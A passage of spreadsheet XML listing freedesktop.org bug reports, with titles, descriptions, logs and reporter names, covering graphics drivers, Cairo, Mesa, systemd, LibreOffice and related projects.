So the solution is to provide an API to detect dedicated video memory size not having to resort to NV_CTRL_VIDEO_RAM and similar vendor-specific ways. This might go to xrandr or be an extension for GLX.</t>
  </si>
  <si>
    <t>CAIRO-9148</t>
  </si>
  <si>
    <t>invalid rendering when painting large scaled-down surfaces</t>
  </si>
  <si>
    <t>I have a program that renders source surfaces of varying sizes onto a target
surface.  This is using the image backend only.  (More precisely I've only
tested this backend.)
The source surfaces have various sizes but are scaled down to have the same
effective size on the target (i.e. kind of like mipmapping).
When the source image is larger than the surface and the CTM is scaling the
image down to a small size and the CTM translates the image toward the bottom
right then the image gets clipped and mangled (when it shouldn't be).  
Test cases speak louder than words.  See the attachment.  It's a program that
creates PNGs for a series of source image sizes showing the lower-righthand
portion exhibiting error while the upper-lefthand portion remains intact.
BTW the error happens in both 1.2.4 and the git head but the pixels in the
area in interest differ using the git head.</t>
  </si>
  <si>
    <t>eswartz</t>
  </si>
  <si>
    <t>XORG-30086</t>
  </si>
  <si>
    <t>Nouveau fails with unreadable EDID</t>
  </si>
  <si>
    <t>On a Sony VPCCW2S1E laptop EDID seems to be somehow unreadable:
get-edid: get-edid version 2.0.0
 Performing real mode VBE call
 Interrupt 0x10 ax=0x4f00 bx=0x0 cx=0x0
 Function supported
 Call successful
 VBE version 300
 VBE string at 0x11100 NVIDIA
VBE/DDC service about to be called
 Report DDC capabilities
 Performing real mode VBE call
 Interrupt 0x10 ax=0x4f15 bx=0x0 cx=0x0
 Function supported
 Call successful
 Monitor and video card combination does not support DDC1 transfers
 Monitor and video card combination does not support DDC2 transfers
 0 seconds per 128 byte EDID block transfer
 Screen is not blanked during DDC transfer
Reading next EDID block
VBE/DDC service about to be called
 Read EDID
 Performing real mode VBE call
 Interrupt 0x10 ax=0x4f15 bx=0x1 cx=0x0
 Function supported
 Call failed
The EDID data should not be trusted as the VBE call failed
Error: output block unchanged
Video card is a GT 330 M:
01:00.0 VGA compatible controller: nVidia Corporation GT216 [GeForce GT 330M] (rev a2) (prog-if 00 [VGA controller])
	Subsystem: Sony Corporation Device 9072
	Flags: bus master fast devsel latency 0 IRQ 16
	Memory at e2000000 (32-bit non-prefetchable) [size=16M]
	Memory at d0000000 (64-bit prefetchable) [size=256M]
	Memory at e0000000 (64-bit prefetchable) [size=32M]
	I/O ports at d000 [size=128]
	Expansion ROM at e3000000 [disabled] [size=512K]
	Capabilities: 
	Kernel driver in use: nvidia
	Kernel modules: nvidia-current nouveau nvidiafb
When loading nouveau driver can't find the laptop's LCD screen and display is black.
Notice that proprietary NVidia driver has the same problem but it offers a workaround with the customEDID option:
Option CustomEDID DFP-0:/etc/X11/SNY05FA.bin
Nouveau does not seem to have such an option... Is there a workaround for nouveau? Or is there a way to find why the EDID cannot be read?</t>
  </si>
  <si>
    <t>alci</t>
  </si>
  <si>
    <t>PULSEAUDIO-92071</t>
  </si>
  <si>
    <t>USB audio latency is (unnecessarily) high</t>
  </si>
  <si>
    <t>Since we started respecting the BATCH flag USB audio device latency has been fixed at 100ms in our default config.
The BATCH flag is probably not what we want here so we need to have finer grained reporting from ALSA which we can use to configure rewind safeguards for tsched mode (instead of always disabling it).
Faililng this I'd like to at least have workaround for USB until this is fixed preoprly.</t>
  </si>
  <si>
    <t>XORG-10454</t>
  </si>
  <si>
    <t>touchscreen support can't be enabled with --enable-tslib</t>
  </si>
  <si>
    <t>Touchscreen support in Xfbdev is never used even when configuring with --enable-tslib because TOUCHSCREEN is never defined in configure.ac</t>
  </si>
  <si>
    <t>philipp.zabel</t>
  </si>
  <si>
    <t>DBUS-11672</t>
  </si>
  <si>
    <t>run-test.sh requires /bin/bash</t>
  </si>
  <si>
    <t>Many platforms do not have a /bin/bash but run-test.sh starts:
#! /bin/bash
If a bash shell is required test for it in configure and AC_SUBST the value into run-test.sh.in otherwise use /bin/sh.</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-26273</t>
  </si>
  <si>
    <t>Error at compilation time when builddir != srcdir</t>
  </si>
  <si>
    <t>Hi
Here is a little patch for shared-mime-info to fix an error:
Couldn't find freedesktop.org.xml
at compilation time when builddir != srcdir .</t>
  </si>
  <si>
    <t>florent</t>
  </si>
  <si>
    <t>MESA-105396</t>
  </si>
  <si>
    <t>tc compatible htile sets depth of htiles of discarded fragments to 1.0</t>
  </si>
  <si>
    <t>Created attachment 137887
Renderdoc v1.0 capture
On RADV when using a VK_FORMAT_D32_SFLOAT (or VK_FORMAT_D32_SFLOAT_S8_UINT) depth buffer cleared to 0.0 if a fragment shader discards all fragments in a cleared htile the htile's depth can be set to 1.0 instead of keeping the clear value of 0.0.
The attached renderdoc capture reproduces the issue by clearing the depth buffer to 0.0 with vkCmdClearAttachments then drawing a triangle in the upper left half of an image using a shader which discards fragments that lie outside of a semicircle. The bug doesn't reproduce if I remove the vkCmdClearAttachments and use VK_LOAD_OP_CLEAR at the start of the render pass. However I have another more complex application which appears to be using VK_LOAD_OP_CLEAR in an earlier renderpass and loading stored depth values in a renderpass which reproduces this bug without using other clears in the middle.
I'm using git revision fb5825e7ceeb16ac05f870ffe1e5a5daa09e68dd on an AMD RX 480.
Setting RADV_DEBUG to nohiz or nofastclears avoids the bug.</t>
  </si>
  <si>
    <t>SYSTEMD-63389</t>
  </si>
  <si>
    <t>localectl list-locales shows locale names in wrong encoding</t>
  </si>
  <si>
    <t>$ rpm -q systemd
systemd-200-4.fc19.x86_64
$ localectl list-locales
...
bokmal
bokml
...
franais
french
...
$ localectl list-locales | grep fran | iconv -f iso8859-1
franÃ§ais
$ locale
LANG=en_US.UTF-8
LC_CTYPE=en_US.UTF-8
LC_NUMERIC=en_US.UTF-8
LC_TIME=en_US.UTF-8
LC_COLLATE=en_US.UTF-8
LC_MONETARY=en_US.UTF-8
LC_MESSAGES=en_US.UTF-8
LC_PAPER=en_US.UTF-8
LC_NAME=en_US.UTF-8
LC_ADDRESS=en_US.UTF-8
LC_TELEPHONE=en_US.UTF-8
LC_MEASUREMENT=en_US.UTF-8
LC_IDENTIFICATION=en_US.UTF-8
LC_ALL=</t>
  </si>
  <si>
    <t>PAPYON-31004</t>
  </si>
  <si>
    <t>Since today (18/oct) papyon doesn't connect anymore</t>
  </si>
  <si>
    <t>Today papyon based clients stopped working: aMSN2 emesene2 and telepathy. Any attempt to connect causes this error:
[16:26:13 ERROR papyon.gnet.HTTP] Received error code 500 (Internal Server Error) from contacts.msn.com:80
[16:26:13 WARNING papyon.service] Transport Error :500
Non-papyon-based clients still work.</t>
  </si>
  <si>
    <t>whisky.junk</t>
  </si>
  <si>
    <t>MESA-33217</t>
  </si>
  <si>
    <t>openvg (OpenVG) fails to compile</t>
  </si>
  <si>
    <t>openvg (OpenVG) fails to compile.
make[3]: *** No rule to make target `../../../../src/gallium/state_trackers/vega/libvega.a' needed by `../../../../lib/egl/st_OpenVG.so'.  Stop.
Configuration:
  ./autogen.sh --prefix=/usr \
  --with-dri-driverdir=/usr/lib/xorg/modules/dri \
  --with-dri-drivers=radeonr200r300r600 \
  --with-state-trackers=glxdriegl \
  --with-egl-platforms=x11drm \
  --with-driver=dri \
  --enable-opengl \
  --enable-gles1 \
  --enable-gles2 \
  --enable-openvg \
  --enable-xcb \
  --enable-glx-tls \
  --enable-driglx-direct \
  --enable-egl \
  --disable-glut \
  --enable-gallium \
  --enable-gallium-egl \
  --enable-gallium-r600 \
  --enable-gallium-radeon \
  --disable-gallium-llvm \
  --disable-gallium-nouveau \
  --disable-gallium-swrast</t>
  </si>
  <si>
    <t>LIBREOFFICE-60722</t>
  </si>
  <si>
    <t>RTF import wrong shape order and coloring problems</t>
  </si>
  <si>
    <t>Created attachment 74674
example source.rtf file
1. When you import RTF file with multiple shapes with \shpz0 - they are not placed one over another (like MSO do and many applications expect us to) but shuffled under instead.
2. Lines w/o defined color are colored blue and line width are defaulted to 0.0 while expected defaults are black and 0.3mm. Shapes are colored black.
3. When you save it in RTF - lines are saved as blue line width isn't saved at all squares which were previously black became blue square order isn't kept.</t>
  </si>
  <si>
    <t>bugzill</t>
  </si>
  <si>
    <t>GSTREAMER_SDK-59485</t>
  </si>
  <si>
    <t>Linux SDK Distribution</t>
  </si>
  <si>
    <t>[ANDROID] Linking error between ffmpeg and ffmpegcolorspace plugins</t>
  </si>
  <si>
    <t>Hi 
I am trying to build tutorial 5 for Android with ffmpeg plugin but I am getting following linking error:
luigi@Fender:~/workspace/Tutorial5$ ndk-build 
GStreamer      : [GEN] =&gt; gst-build/gstreamer_android.c
GStreamer      : [COMPILE] =&gt; gst-build/gstreamer_android.c
GStreamer      : [LINK] =&gt; gst-build/libgstreamer_android.so
/home/luigi/projects/android-ndk-r8d/toolchains/arm-linux-androideabi-4.6/prebuilt/linux-x86/bin/../lib/gcc/arm-linux-androideabi/4.6/../../../../arm-linux-androideabi/bin/ld.gold: error: /home/luigi/projects/gstreamer/release/lib/libavutil.a(mem.o): multiple definition of 'av_malloc'
/home/luigi/projects/android-ndk-r8d/toolchains/arm-linux-androideabi-4.6/prebuilt/linux-x86/bin/../lib/gcc/arm-linux-androideabi/4.6/../../../../arm-linux-androideabi/bin/ld.gold: /home/luigi/projects/gstreamer/release/lib/gstreamer-0.10/static/libgstffmpegcolorspace.a(libgstffmpegcolorspace_la-mem.o): previous definition here
/home/luigi/projects/android-ndk-r8d/toolchains/arm-linux-androideabi-4.6/prebuilt/linux-x86/bin/../lib/gcc/arm-linux-androideabi/4.6/../../../../arm-linux-androideabi/bin/ld.gold: error: /home/luigi/projects/gstreamer/release/lib/libavutil.a(mem.o): multiple definition of 'av_realloc'
/home/luigi/projects/android-ndk-r8d/toolchains/arm-linux-androideabi-4.6/prebuilt/linux-x86/bin/../lib/gcc/arm-linux-androideabi/4.6/../../../../arm-linux-androideabi/bin/ld.gold: /home/luigi/projects/gstreamer/release/lib/gstreamer-0.10/static/libgstffmpegcolorspace.a(libgstffmpegcolorspace_la-mem.o): previous definition here
/home/luigi/projects/android-ndk-r8d/toolchains/arm-linux-androideabi-4.6/prebuilt/linux-x86/bin/../lib/gcc/arm-linux-androideabi/4.6/../../../../arm-linux-androideabi/bin/ld.gold: error: /home/luigi/projects/gstreamer/release/lib/libavutil.a(mem.o): multiple definition of 'av_free'
/home/luigi/projects/android-ndk-r8d/toolchains/arm-linux-androideabi-4.6/prebuilt/linux-x86/bin/../lib/gcc/arm-linux-androideabi/4.6/../../../../arm-linux-androideabi/bin/ld.gold: /home/luigi/projects/gstreamer/release/lib/gstreamer-0.10/static/libgstffmpegcolorspace.a(libgstffmpegcolorspace_la-mem.o): previous definition here
collect2: ld returned 1 exit status
make: *** [buildsharedlibrary] Error 1
Looks like av_malloc av_realloc and av_free are beeing defined both in ffmpeg and ffmpegcolorspace.
Thanks.</t>
  </si>
  <si>
    <t>luis.linietsky</t>
  </si>
  <si>
    <t>XORG-10575</t>
  </si>
  <si>
    <t>xmessage: wrong window size displaying message with tabs</t>
  </si>
  <si>
    <t>Problem reported in the Debian BTS by Kevin Ryde 8 years ago still applies to latest xmessage:
I noticed that xmessage can get its initial window size wrong when
displaying a message containing tab characters.  For example create a
file containing
        hello world
and run
        xmessage -file foo
and it shows scroll bars rather than making its window big enough.
Patch below to convert tabs to spaces in the message both
for file and command line messages. ab stops are 8 characters (hard
coded) newlines are understood.</t>
  </si>
  <si>
    <t>XORG-18933</t>
  </si>
  <si>
    <t>[915G] 2d acceleration slow</t>
  </si>
  <si>
    <t>Created attachment 20874
xorg.conf
Since updating my drivers from the 2.1.1 stable of xf86-video-i810 to 2.5.1 of the intel drivers 2D acceleration has become dramatically slower. When opening or restoring windows the contents of them can be seen clearly being drawn on the screen. Amarok maybe takes 2-3 seconds to draw itself before it becomes responsive. During this the X process has high cpu usage similarly it is high when any 2d rendering is being done for example when Amarok is open the standard visualisation running makes the X process use 10-30% cpu time. I have tried a plethora of xorg.conf settings but none work including XAA (i think it has been removed in the latest 2.5.X releases but I tried it with 2.4.3)</t>
  </si>
  <si>
    <t>uber_cow</t>
  </si>
  <si>
    <t>CAIRO-21443</t>
  </si>
  <si>
    <t>STATA on Unix - SSH won't launch xstata</t>
  </si>
  <si>
    <t>Error: Cairo does not yet support the requested image format:
        Depth: 8
        Alpha mask: 0x00000000
        Red   mask: 0x00000000
        Green mask: 0x00000000
        Blue  mask: 0x00000000
Please file an enhacement request (quoting the above) at:
http://bugs.freedesktop.org/enter_bug.cgi?product=cairo</t>
  </si>
  <si>
    <t>mouellet</t>
  </si>
  <si>
    <t>SYSTEMD-46483</t>
  </si>
  <si>
    <t>sd-login.h: class is a reserved keyword in c++</t>
  </si>
  <si>
    <t>C++ apps including sd-login.h (like gnome-system-monitor) are no longer compiling since v43 due to a variable called class which is reserved in c++.</t>
  </si>
  <si>
    <t>gkulyk</t>
  </si>
  <si>
    <t>XORG-9601</t>
  </si>
  <si>
    <t>Mouse clicks pass through titlebar of maximized windows</t>
  </si>
  <si>
    <t>Running current compiz from git (`compiz --version` == 0.3.7) the following occurs:
1.  Start a compiz/gnome session and launch gnome-terminal (or anything else)
2.  Maximize gnome-terminal (e.g. by clicking the max button on the title bar)
3.  Click on the title bar of the maximized window (button 1)
Expected result: nothing much
Actual result: whatever is behind the gnome-terminal window receives the mouse
click (typically the desktop)
This happens when using any type of window decoration (including the built-in
decoration). It happens with any application window and any mouse button. It
also happens if the window is just maximized vertically.
Version 0.3.6 did not have this bug. I earlier mentioned this problem in a
comment on Bug #9257 and incorrectly stated there that this problem only
occurred with kde-window-decorator.</t>
  </si>
  <si>
    <t>DRI-66077</t>
  </si>
  <si>
    <t>Oops reading i915_error_state</t>
  </si>
  <si>
    <t>[76973.700434] BUG: unable to handle kernel paging request at 0000000000001000
    [76973.700468] IP: [] strnlen+0xd/0x40
    [76973.700494] PGD 10387b067 PUD 15411a067 PMD 0
    [76973.700515] Oops: 0000 [#1] SMP
    [76973.700529] Modules linked in: cpufreq_userspace cpufreq_powersave cpufreq_stats cpufreq_conservative binfmt_misc nfs lockd fscache sunrpc coretemp crc32c_intel ghash_clmulni_intel aesni_intel aes_x86_64 ablk_helper cryptd lrw gf128mul glue_helper iTCO_wdt iTCO_vendor_support microcode i2c_i801 lpc_ich mfd_core acpi_cpufreq mperf evdev processor ext4 crc16 jbd2 mbcache sd_mod crc_t10dif ahci libahci libata scsi_mod thermal fan
    [76973.700718] CPU: 2 PID: 13279 Comm: intel_error_dec Not tainted 3.10.0-rc6+ #99
    [76973.700746] Hardware name: Intel Corporation Shark Bay Client platform/Flathead Creek Crb BIOS HSWLPTU1.86C.0109.R03.1301282055 01/28/2013
    [76973.700793] task: ffff880153fa2100 ti: ffff880152310000 task.ti: ffff880152310000
    [76973.700820] RIP: 0010:[]  [] strnlen+0xd/0x40
    [76973.700849] RSP: 0018:ffff880152311cb0  EFLAGS: 00010286
    [76973.700869] RAX: ffffffff81774000 RBX: ffff880154000072 RCX: fffffffffffffffe
    [76973.700895] RDX: 0000000000001000 RSI: ffffffffffffffff RDI: 0000000000001000
    [76973.700920] RBP: ffff880152311cb0 R08: 000000000000ffff R09: 000000000000ffff
    [76973.700948] R10: 0000000000000000 R11: 000000000000000f R12: 0000000000001000
    [76973.700974] R13: ffff880154001000 R14: 00000000ffffffff R15: 0000000000000000
    [76973.701000] FS:  00007f00fc942880(0000) GS:ffff88015e300000(0000) knlGS:0000000000000000
    [76973.701029] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    [76973.701050] CR2: 0000000000001000 CR3: 000000015939a000 CR4: 00000000001407e0
    [76973.701075] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
    [76973.701103] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
    [76973.701128] Stack:
    [76973.701136]  ffff880152311ce8 ffffffff811fdafb ffff880154000072 ffff880154001000
    [76973.701167]  ffff880152311d58 ffffffff817a703e ffffffff817a703e ffff880152311d48
    [76973.701198]  ffffffff811fe8a9 0000000a0000ffff 0000000000000001 ffff880154000000
    [76973.701229] Call Trace:
    [76973.701242]  [] string.isra.5+0x3b/0xf0
    [76973.701264]  [] vsnprintf+0x1d9/0x670
    [76973.701286]  [] i915_error_printf+0xb9/0x160
    [76973.701311]  [] print_error_buffers+0x18c/0x1e0
    [76973.701335]  [] i915_error_state_read+0x40e/0x8e0
    [76973.701361]  [] vfs_read+0x97/0x160
    [76973.701381]  [] SyS_read+0x44/0x90
    [76973.701403]  [] system_call_fastpath+0x16/0x1b
    [76973.701424] Code: c0 01 80 38 00 75 f7 48 29 f8 5d c3 31 c0 5d c3 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 48 8d 4e ff 48 85 f6 48 89 e5 74 2a  3f 00 74 25 48 89 f8 31 d2 eb 10 0f 1f 80 00 00 00 00 48 83
    [76973.701535] RIP  [] strnlen+0xd/0x40
    [76973.701550]  RSP 
    [76973.701559] CR2: 0000000000001000
The patch I sent doesn't fix the bug - it seems to be using %s (void *)4096. Bizarre.</t>
  </si>
  <si>
    <t>LIBREOFFICE-40447</t>
  </si>
  <si>
    <t>CONFIGURATION: Macro security dialog does not open</t>
  </si>
  <si>
    <t>With Master LibO-dev 3.5.0 â€“ WIN7 Home Premium (64bit) English UI [(Build ID: f952331-4eb4f62-09af278)] installed due to  :
Steps to reproduce:
0. Start LibO Master Start Center
1. Open new Writer document from  Start Center
2. Menu 'Tools -&gt; Options -&gt; Security' click button 'Macro Security'
   Expected: Macro security dialog will open
   Actual: Button shows click reaction but nothing happens no new dialog
           opens</t>
  </si>
  <si>
    <t>MESA-55420</t>
  </si>
  <si>
    <t>[Wine] fails to compile GLSL shader in Falcon BMS 4.32u3</t>
  </si>
  <si>
    <t>Created attachment 67819
complete log file
16:02  weirdo adds on the bug that the shader uses too much temp (more than 128 max r600 temp) because of indirect addressing
16:03  weirdo glsl-to-tgsi does not allocate register when there is indirect addressing</t>
  </si>
  <si>
    <t>sthalik</t>
  </si>
  <si>
    <t>GTK-QT_ENGINE-4904</t>
  </si>
  <si>
    <t>missing toolbar icons</t>
  </si>
  <si>
    <t>gtk-qt-engine-0.6 kde-3.4.3 gtk2-2.6.10 Fedora Core 4.  I'm seeing quite a
few gtk2/gnome applications fail to render their toolbar icons (small square
boxes with a red-X are shown instead).  Icons in menus appear fine. 
Applications include abiword-2.4.1 evince-0.4.0 gimp-2.2.8 planner-0.13.</t>
  </si>
  <si>
    <t>LIBREOFFICE-59885</t>
  </si>
  <si>
    <t>Kazakh language is incorrectly named as Kazak</t>
  </si>
  <si>
    <t>Hello
I use nightly builds of LibreOffice 4 and Kazakh language packs.
I noticed that Kazakh language is incorrectly named as Kazak.
Could you please fix this before LibreOffice 4 release?
When I search for it in pootle I can see that it is located in
svtools/source/misc.po file. 
https://translations.documentfoundation.org/kk/libo_ui/translate.html#unit=30054973
Thank you!</t>
  </si>
  <si>
    <t>baurthefirst</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-6491</t>
  </si>
  <si>
    <t>svn up on gabe is giving malformed network data error</t>
  </si>
  <si>
    <t>Here is the output I'm getting:
rejon@gabe:~/openfontlibrary.freedesktop.org/openfontlibrary_web$ svn up
svn: Malformed network data
rejon@gabe:~/openfontlibrary.freedesktop.org/openfontlibrary_web$ cd ..
rejon@gabe:~/openfontlibrary.freedesktop.org$ ls
backup  moin  openfontlibrary_web  www
rejon@gabe:~/openfontlibrary.freedesktop.org$ svn co
svn://anonsvn.freedesktop.org/svn/openfontlibrary test
svn: Malformed network data
rejon@gabe:~/openfontlibrary.freedesktop.org$
I don't know what is happening but I can't svn up with the anon server nor
check out with the anon svn server. I also tried to check out from normal
server but that fails because of security (which is expected)
Has something changed in configuration?
We check out a module create_web for the website on the fd.o server. Also the
same is done for open font library.
This also afflicts http://openfontlibrary.org
Thanks
Jon</t>
  </si>
  <si>
    <t>SYNCEVOLUTION-52703</t>
  </si>
  <si>
    <t>Build warning: no AC_LANG_SOURCE call detected in body with autoconf 2.68</t>
  </si>
  <si>
    <t xml:space="preserve">
---- Reported by blixtra@gmail.com 2011-05-16 12:23:31 +0000 ----
Created attachment 6462
Patch to fix build warning
When running autogen.sh several of the following warnings are output.
warning: AC_LANG_CONFTEST: no AC_LANG_SOURCE call detected in body
The patch wraps the source code inside the AC_COMPILE_IFELSE blocks with the AC_LANG_SOURCE macro.
The fix comes from the following email thread:
http://www.mail-archive.com/bug-autoconf@gnu.org/msg03051.html
---- Additional Comments From patrick.ohly@intel.com 2011-05-17 11:50:39 +0000 ----
Merged thanks.
--- Bug imported by patrick.ohly@gmx.de 2012-07-29 20:36 UTC  ---
This bug was previously known as _bug_ 17624 at https://bugs.meego.com/show_bug.cgi?id=17624
Imported an attachment (id=64854)
</t>
  </si>
  <si>
    <t>XORG-4017</t>
  </si>
  <si>
    <t>Patch to xkbcomp/README.config.</t>
  </si>
  <si>
    <t>Attached is a patch for fixing several typos in the file xkbcomp/README.config.
It covers Debian bugs #315555 and #321946.</t>
  </si>
  <si>
    <t>ender</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-93429</t>
  </si>
  <si>
    <t>Account request for freedesktop.org</t>
  </si>
  <si>
    <t>Created attachment 120570
SSH key
Real name: Joonas Lahtinen
Account name: dolphin
Email: joonas.lahtinen@linux.intel.com
Working on the i915 kernel driver and intel-gpu-tools.</t>
  </si>
  <si>
    <t>TELEPATHY-20565</t>
  </si>
  <si>
    <t>Contacts should be initially offline and not unknown</t>
  </si>
  <si>
    <t>We retrieving the contact list contacts that are offline initially appear as unknown while if they are online and disconnect they appear as offline. This makes sense from a XMPP point of view but less from an application point of view for instance if I want to display a different icon for offline contacts and contacts that are not in my subscribe list.
To test this you can use the list_contacts example in the telepathy-doc.</t>
  </si>
  <si>
    <t>XORG-15546</t>
  </si>
  <si>
    <t>Radeon: Omit mask coordinates</t>
  </si>
  <si>
    <t>Created attachment 15964
Patch skipping mask coordinates
For the last week or so I've been chasing curiously bad glyph
drawing (and other compositing) performance on R300. The observed 
behavior was that we could draw ~72000 vertices / second (and
thus 18000 boxes / second) without regard to the size of the
triangles or how much setup we were doing around them. Some 
investigation revealed that the problem was apparently calculating 
vertex coordinates in the VAP for texture 1 without having a texture 1.
For glyph drawing before and after performance is:
                 before         after
String length    glyphs/sec     glyphs/sec
-------------    ------------------------
1                17266           32109
5:               18083           87673
10:              18187          126210
20:              18224          151805
50:              18248          173471
I also constructed a simpler benchmark that composited a
batch of N boxes of size MxM. (Using a clip region to 
get all the boxes in a batch drawn in a single go.)
            before        after      	 GL
Size  Count box/s Mpix/s  box/s Mpix/s  box/s   Mpix/s
----- ----  ----- ------  -----	------  ------- ------
10x10    5  18581    1.9  304433    31  1110150   111
10x10   20  18583    1.9  421277    42	1105830   111
10x10   50  18568    1.9  404612    40  1110340	  111
20x20   20  18335    7.3  276540   106   872726   349
50x50   20  16844   42.1   46949   117   121075   302
(I hope bugzilla will not mangle the above tables)
The third column gives an idea of how much we can improve
further since it shows the same thing being done by the 
r300 3d driver which avoids the unnecessary repeated 
texture setup and cache flushing we are doing in the 2D
driver. We should be able to come close to the 1 million
glyph/sec mark for longer glyph strings of small characters.
The patch I'm attaching:
 - May not quite apply cleanly without the patches from
   bug 15371 but is independent.
 - Has only been tested on R300 not older or newer 
   cards. (I wanted to keep the coordinates we emitted
   the same everywhere though I suspect performance
   gains will be minimal elsewhere.)
 - Has only been tested for CP not MMIO
I don't think there will be any major problems on other
cards or MMIO but their might be typos or some register
that I forgot to adjust.</t>
  </si>
  <si>
    <t>DRI-15382</t>
  </si>
  <si>
    <t>Patches for dri2 linux-core</t>
  </si>
  <si>
    <t>Created attachment 15732
Null check order fixes uninit
Hello
the first patch sets fixes dereferences before NULL check problems
ans an probably uninit variable.
The 2nd adds forgotten KERNEL_VERSION macro.
Please apply attached patches
Roland Test-tools BÃ¤r</t>
  </si>
  <si>
    <t>TELEPATHY-64636</t>
  </si>
  <si>
    <t>Add service side classes to tp-qt</t>
  </si>
  <si>
    <t>Hi some time ago Matthias Gehre implemented initial support for service side classes on telepathy-qt.
His branch is available at: 
https://github.com/mgehre/telepathy-qt
On top of his changes I implemented Call related interfaces:
- BaseChannelCallType
- BaseCallContent
- BaseCallMuteInterface
- BaseChannelHoldInterface
- BaseCallContentDTMFInterface
The code is available here: http://bazaar.launchpad.net/~tiagosh/telepathy-qt/telepathy-qt-basecall/revision/26?compare_revid=22
George Kiagiadakis asked me be create this bug report to start the process of getting all this code reviewed and merged.
Thank you.</t>
  </si>
  <si>
    <t>LIBREOFFICE-51270</t>
  </si>
  <si>
    <t>On UNINSTALLING LibreOffice leaves dirt behind</t>
  </si>
  <si>
    <t>On vanilla uninstallation LibreOffice leaves a folder in %PROGRAMFILES%\LibreOffice 3.5\ containing extensions and python folders
LibreOffice uninstall should destroy %PROGRAMFILES%\LibreOffice 3.5\ completely.</t>
  </si>
  <si>
    <t>LIBREOFFICE-61801</t>
  </si>
  <si>
    <t>crash on Tools - Options - LibreOffice - Personalization - Select Background Image</t>
  </si>
  <si>
    <t>gdb output:
terminate called after throwing an instance of 'com::sun::star::lang::IllegalArgumentException'
Program received signal SIGABRT Aborted.
0xb7fdd424 in __kernel_vsyscall ()
(gdb) bt
#0  0xb7fdd424 in __kernel_vsyscall ()
#1  0xb7b501df in __GI_raise (sig=6)
    at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#2  0xb7b53825 in __GI_abort () at abort.c:91
#3  0xb7dc313d in __gnu_cxx::__verbose_terminate_handler() ()
   from /usr/lib/i386-linux-gnu/libstdc++.so.6
#4  0xb7dc0ed3 in ?? () from /usr/lib/i386-linux-gnu/libstdc++.so.6
#5  0xb7dc0f0f in std::terminate() ()
   from /usr/lib/i386-linux-gnu/libstdc++.so.6
#6  0xb7dc10b4 in __cxa_rethrow () from /usr/lib/i386-linux-gnu/libstdc++.so.6
#7  0xa3f76f58 in com::sun::star::ui::dialogs::FilePicker::createDefault (
    the_context=uno::Reference to (XInterface) 0xaf33d2e0)
    at /home/ivan/libo/master/solver/unxlngi6/inc/offapi/com/sun/star/ui/dialogs/FilePicker.hpp:31
#8  0xa3f75404 in SvxPersonalizationTabPage::SelectBackground (this=0x8ac92e0)
    at /home/ivan/libo/master/cui/source/options/personalization.cxx:214
I think it's related to commit 4b51374a7021d52f7f1be1861e2ee6a011b30ecd fdo#46808 Adapt ui::dialogs::FilePicker UNO service to new style 
Noel can you have a look please?</t>
  </si>
  <si>
    <t>XORG-25623</t>
  </si>
  <si>
    <t>Xorg segfaults when using nouveau.tv_norm=1080i on NV4B</t>
  </si>
  <si>
    <t>Created attachment 32045
Xorg Log
Summary says most of it. Xorg segfaults when loading. Compiled from git. Attached the Xorg log.</t>
  </si>
  <si>
    <t>richie</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-51307</t>
  </si>
  <si>
    <t>Docs: README: Clean up grammar/formatting and mention bugzilla</t>
  </si>
  <si>
    <t>Created attachment 63315
Patch apply with `git am'
The main change provided by this commit is information on where to submit and bug reports and patches namely freedesktop's bugzilla system.
Otherwise the content remains much the same there are only structural changes (grammar white space improvements etc.)
Apply the provided patch with `git am'. It would be best to check the result by simply reading the README rather than the diff.</t>
  </si>
  <si>
    <t>mfwitten</t>
  </si>
  <si>
    <t>XORG-20505</t>
  </si>
  <si>
    <t>radeon planar textured video</t>
  </si>
  <si>
    <t>A patch to speed up textured video was posted on the xorg ML:
http://lists.freedesktop.org/archives/xorg/2009-February/043932.html
Would be nice if it can be merged in the radeon driver someway.</t>
  </si>
  <si>
    <t>LIBREOFFICE-80540</t>
  </si>
  <si>
    <t>VIEWING: Stock chart does not display correctly</t>
  </si>
  <si>
    <t>Created attachment 101775
Attached is one of the stock charts in my spreadsheet exported as picture
Problem description: 
The attached stock chart (type4) shows the problem clearly. The red and yellow sticks are misplaced in relation to the thin lines. They should be positioned over these thin lines but are placed to the right and downwards.
Steps to reproduce:
1. ....
2. ....
3. ....
Current behavior:
Expected behavior:
Operating System: Linux (Other)
Version: 4.2.4.2 release</t>
  </si>
  <si>
    <t>mjmvanweert</t>
  </si>
  <si>
    <t>XORG-53</t>
  </si>
  <si>
    <t>man page of Xft confuses 0 and NULL</t>
  </si>
  <si>
    <t>The man page of Xft contains: 
man Xft&gt;        XftFont * 
man Xft&gt;        XftFontOpen (Display *dpy int screen ...) 
man Xft&gt;        XftFontOpen takes a list of pattern elements of  the  form 
man Xft&gt;        (field  type  value)  terminated  with a 0 matches that 
man Xft&gt;        pattern against the available fonts and opens the matching 
man Xft&gt;        font. 
i.e. the man page suggests to use 0. But on 64 bit platforms 0 and 
NULL are not the same therefore this causes problems and often 
crashes. I noticed this because mlterm used 0 instead of NULL in this 
function like written in the man page which made mlterm crash often 
on x86_64. To fix these crashes I only had to replace 0 -&gt; NULL. 
The example in the man page 
man Xft&gt;        Example: 
man Xft&gt;             font   =   XftFontOpen   (dpy  scr 
man Xft&gt;        XFT_FAMILY  XftTypeString   charter 
man Xft&gt;        XFT_SIZE XftTypeDouble 12.0) 
doesn't have a terminating argument at all which is probably wrong as well.</t>
  </si>
  <si>
    <t>mfabian</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-13824</t>
  </si>
  <si>
    <t>Add XkbOptions caps:swapescape</t>
  </si>
  <si>
    <t>For vi users is not cool to press ESC everytime to go to command mode and caps lock is a key that a lot of people don't use so much. Since we have option t swap ctrl and caps option to disable caps i created one for me to swap caps and escape a lot of friends of mine are using it today and we would like if it's possible to see it committed on oficial tree because all of us need to patch rules/base and symbols/capslock everytime we install or upgrade xorg.
We agree that it could be useful for a lot of users. Patch can be found here:
http://people.freebsd.org/~garga/patches/xkeyboard-config.patch</t>
  </si>
  <si>
    <t>rbgarga</t>
  </si>
  <si>
    <t>DRI-101439</t>
